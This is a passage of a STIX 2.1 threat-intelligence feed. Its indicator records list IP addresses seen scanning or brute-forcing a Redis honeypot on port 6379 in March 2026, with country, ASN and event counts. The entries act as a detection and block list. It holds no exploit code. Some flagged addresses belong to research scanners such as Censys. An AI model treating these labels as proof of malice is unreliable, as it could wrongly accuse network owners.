      "valid_from": "2026-03-15T07:25:13.000Z",
      "valid_until": "2026-04-16T07:25:12.000Z"
    },
    {
      "created": "2026-03-15T10:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--5e58c20e-d703-481d-96a9-f1ee09e3aee5",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-15T10:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '137.184.169.162']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T10:25:13.000Z",
      "valid_until": "2026-04-16T10:25:12.000Z"
    },
    {
      "created": "2026-03-15T12:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--a00af559-ef38-4f09-9e71-6af7855c5fb9",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-15T12:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '157.245.244.52']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T12:25:07.000Z",
      "valid_until": "2026-04-16T12:25:05.000Z"
    },
    {
      "created": "2026-03-15T12:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--7afca3dc-9001-454d-9b97-fc201d048e70",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-15T12:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '178.128.144.99']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T12:25:07.000Z",
      "valid_until": "2026-04-16T12:25:05.000Z"
    },
    {
      "created": "2026-03-15T12:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--04608f52-96d9-430d-9faf-635d12b20059",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-15T12:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.150.193.200']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T12:25:07.000Z",
      "valid_until": "2026-04-16T12:25:05.000Z"
    },
    {
      "created": "2026-03-15T12:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--68cb3788-2c4b-48e9-b6d9-4795cc612612",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-15T12:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.20.118']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T12:25:07.000Z",
      "valid_until": "2026-04-16T12:25:05.000Z"
    },
    {
      "created": "2026-03-15T13:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=ZA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--42517918-5342-4090-b1d0-2938634ff8b6",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-15T13:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '102.37.102.212']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T13:25:09.000Z",
      "valid_until": "2026-04-16T13:25:07.000Z"
    },
    {
      "created": "2026-03-15T13:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--f0135eaf-efea-45a8-ab6f-cb8c2da08c9d",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-15T13:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '173.255.223.73']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T13:25:09.000Z",
      "valid_until": "2026-04-16T13:25:07.000Z"
    },
    {
      "created": "2026-03-15T14:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--3889a982-cebe-4e6a-8cab-b4bb79954e3c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-15T14:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.201']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T14:25:08.000Z",
      "valid_until": "2026-04-16T14:25:07.000Z"
    },
    {
      "created": "2026-03-15T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=8; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Misc activity; redis_cmd_hits=0",
      "id": "indicator--c36f2837-6aaa-4775-a06e-1874a96f7196",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-15T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '3.137.148.99']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T16:25:13.000Z",
      "valid_until": "2026-04-16T16:25:12.000Z"
    },
    {
      "created": "2026-03-15T21:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=136188; asn_org=NINGBO, ZHEJIANG Province, P.R.China.; redis_cmd_hits=0",
      "id": "indicator--e0f53942-c5c0-4d12-b386-53f603bf60f9",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-15T21:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '110.42.3.79']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T21:25:13.000Z",
      "valid_until": "2026-04-16T21:25:12.000Z"
    },
    {
      "created": "2026-03-15T22:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--61c03249-b01f-4fc0-a8d0-313770b7217c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-15T22:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '198.235.24.219']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T22:25:15.000Z",
      "valid_until": "2026-04-16T22:25:13.000Z"
    },
    {
      "created": "2026-03-15T23:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=TH; asn=135566; asn_org=National Telecom Public Company Limited; redis_cmd_hits=0",
      "id": "indicator--1265e5da-cc94-45b3-8afa-7b170d3c4f63",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-15T23:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '209.15.113.94']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T23:25:13.000Z",
      "valid_until": "2026-04-16T23:25:11.000Z"
    },
    {
      "created": "2026-03-16T02:25:16.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=8; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--24788ee2-bbd4-4f54-826b-9882cacf540b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-16T02:25:16.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '3.144.44.57']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-16T02:25:16.000Z",
      "valid_until": "2026-04-17T02:25:12.000Z"
    },
    {
      "created": "2026-03-16T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=8; ports=6379; cc=SC; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode,Misc activity; redis_cmd_hits=0",
      "id": "indicator--ad1af1cd-644a-44c8-a053-e6098af6b5bf",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-16T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '160.119.76.200']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-16T04:25:13.000Z",
      "valid_until": "2026-04-17T04:25:12.000Z"
    },
    {
      "created": "2026-03-16T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--4ee87e8e-116d-4a8d-a9f8-70315cdf828b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-16T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '40.124.172.38']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-16T04:25:13.000Z",
      "valid_until": "2026-04-17T04:25:12.000Z"
    },
    {
      "created": "2026-03-16T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=23724; asn_org=IDC, China Telecommunications Corporation; redis_cmd_hits=0",
      "id": "indicator--bcf3d726-5eae-4327-b6ff-607cd1ddc93a",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-16T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '49.7.204.85']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-16T04:25:13.000Z",
      "valid_until": "2026-04-17T04:25:12.000Z"
    },
    {
      "created": "2026-03-16T05:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--bd421caa-f48a-4e06-94a9-91e19015cef3",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-16T05:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.221.56.179']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-16T05:25:14.000Z",
      "valid_until": "2026-04-17T05:25:12.000Z"
    },
    {
      "created": "2026-03-16T09:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=AU; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--8d17d6f1-74fc-4c4b-a2f4-6d041c55a693",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-16T09:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '134.199.157.197']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-16T09:25:13.000Z",
      "valid_until": "2026-04-17T09:25:12.000Z"
    },
    {
      "created": "2026-03-16T09:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=25; ports=6379; cc=AU; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode,Misc activity; redis_cmd_hits=0",
      "id": "indicator--0d9dbf91-7679-4834-9486-fd5cf765e5ef",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-16T09:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '170.64.196.209']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-16T09:25:13.000Z",
      "valid_until": "2026-04-17T09:25:12.000Z"
    },
    {
      "created": "2026-03-16T09:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=ID; asn=17451; asn_org=BIZNET NETWORKS; redis_cmd_hits=0",
      "id": "indicator--e10daaff-78fa-4cdb-b01f-a3ca65979ae9",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-16T09:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '182.253.116.60']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-16T09:25:13.000Z",
      "valid_until": "2026-04-17T09:25:12.000Z"
    },
    {
      "created": "2026-03-16T14:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--98997e9b-4087-4b84-b020-0a1339ea8f52",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-16T14:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '123.56.169.187']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-16T14:25:06.000Z",
      "valid_until": "2026-04-17T14:25:05.000Z"
    },
    {
      "created": "2026-03-16T14:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--493f5d0f-6633-4dfb-b11c-204265c4cb3e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-16T14:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '48.211.228.224']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-16T14:25:06.000Z",
      "valid_until": "2026-04-17T14:25:05.000Z"
    },
    {
      "created": "2026-03-16T15:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=59078; asn_org=Yunify Technologies Inc.; redis_cmd_hits=0",
      "id": "indicator--36a83e2d-8b69-4473-ae65-8bc90650f71d",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-16T15:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '139.198.30.179']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-16T15:25:13.000Z",
      "valid_until": "2026-04-17T15:25:12.000Z"
    },
    {
      "created": "2026-03-16T15:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--d1b2a830-ad3e-429b-bf86-c1c4f16e3481",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-16T15:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.187']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-16T15:25:13.000Z",
      "valid_until": "2026-04-17T15:25:12.000Z"
    },
    {
      "created": "2026-03-16T15:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=1; ports=6379; cc=HK; asn=23470; asn_org=ReliableSite.Net LLC; redis_cmd_hits=0",
      "id": "indicator--de8a8b3c-b891-4610-ab32-a1015815d230",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-16T15:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.243.5.22']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-16T15:25:13.000Z",
      "valid_until": "2026-04-17T15:25:12.000Z"
    },
    {
      "created": "2026-03-16T15:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--e4eddad1-8df4-4482-8bd0-a367dbab2d4c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-16T15:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.197.152']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-16T15:25:13.000Z",
      "valid_until": "2026-04-17T15:25:12.000Z"
    },
    {
      "created": "2026-03-16T15:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--7cbcbbb7-ae2a-4eaa-886f-9be210a13f6f",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-16T15:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.197.156']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-16T15:25:13.000Z",
      "valid_until": "2026-04-17T15:25:12.000Z"
    },
    {
      "created": "2026-03-16T23:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=18; ports=6379; cc=CH; asn=212238; asn_org=Datacamp Limited; redis_cmd_hits=0",
      "id": "indicator--68b55e35-03e4-4549-82bb-163b2b251319",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-16T23:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '158.173.152.244']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-16T23:25:02.000Z",
      "valid_until": "2026-04-17T23:25:01.000Z"
    },
    {
      "created": "2026-03-17T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--ba0e5204-5813-419a-abf2-6897ce5c733f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-17T06:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '137.184.23.12']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T06:25:13.000Z",
      "valid_until": "2026-04-18T06:25:12.000Z"
    },
    {
      "created": "2026-03-17T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--fc12a587-5b90-4752-9daf-676cf1f3d6ff",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-17T06:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '192.241.151.83']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T06:25:13.000Z",
      "valid_until": "2026-04-18T06:25:12.000Z"
    },
    {
      "created": "2026-03-17T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=2; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Misc activity; redis_cmd_hits=0",
      "id": "indicator--e7504330-b5d6-4e44-9dd8-36caa7c5a215",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-17T06:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '3.131.220.121']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T06:25:13.000Z",
      "valid_until": "2026-04-18T06:25:12.000Z"
    },
    {
      "created": "2026-03-17T07:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=146966; asn_org=China Telecom; redis_cmd_hits=0",
      "id": "indicator--7e06cf3f-a946-4039-9664-848472c00b55",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-17T07:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '121.237.180.162']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T07:25:13.000Z",
      "valid_until": "2026-04-18T07:25:12.000Z"
    },
    {
      "created": "2026-03-17T07:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=BR; asn=266605; asn_org=2B Tecnologias em Informatica LTDA; redis_cmd_hits=0",
      "id": "indicator--9529f673-e227-4e77-9e94-31da57a722ed",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-17T07:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.7.144.144']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T07:25:13.000Z",
      "valid_until": "2026-04-18T07:25:12.000Z"
    },
    {
      "created": "2026-03-17T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--706340e9-c8db-466d-8673-c425783bf2d6",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-17T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '143.42.1.189']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T13:25:13.000Z",
      "valid_until": "2026-04-18T13:25:12.000Z"
    },
    {
      "created": "2026-03-17T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--72e53e55-d477-4f98-a09c-d04dfa15ba8f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-17T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.55.2.194']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T13:25:13.000Z",
      "valid_until": "2026-04-18T13:25:12.000Z"
    },
    {
      "created": "2026-03-17T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--4ed88d92-c020-46ad-9bf4-bbb7100f7706",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-17T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.197.227']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T13:25:13.000Z",
      "valid_until": "2026-04-18T13:25:12.000Z"
    },
    {
      "created": "2026-03-17T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--c77c4143-7ff5-468d-9540-440d7aa8dafd",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-17T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.197.230']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T13:25:13.000Z",
      "valid_until": "2026-04-18T13:25:12.000Z"
    },
    {
      "created": "2026-03-17T16:25:23.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--a51b2d3e-bcd7-43e9-ab29-8929f9c744fa",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-17T16:25:23.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.200']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T16:25:23.000Z",
      "valid_until": "2026-04-18T16:25:12.000Z"
    },
    {
      "created": "2026-03-17T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=11; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0",
      "id": "indicator--5618dd10-8df0-468e-a5f0-bb8308d0b35f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-17T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '1.83.125.180']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T19:25:13.000Z",
      "valid_until": "2026-04-18T19:25:12.000Z"
    },
    {
      "created": "2026-03-17T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0",
      "id": "indicator--0149d411-84c1-43d4-a80f-e61a206367ed",
      "labels": [
        "scanning_host"
      ],
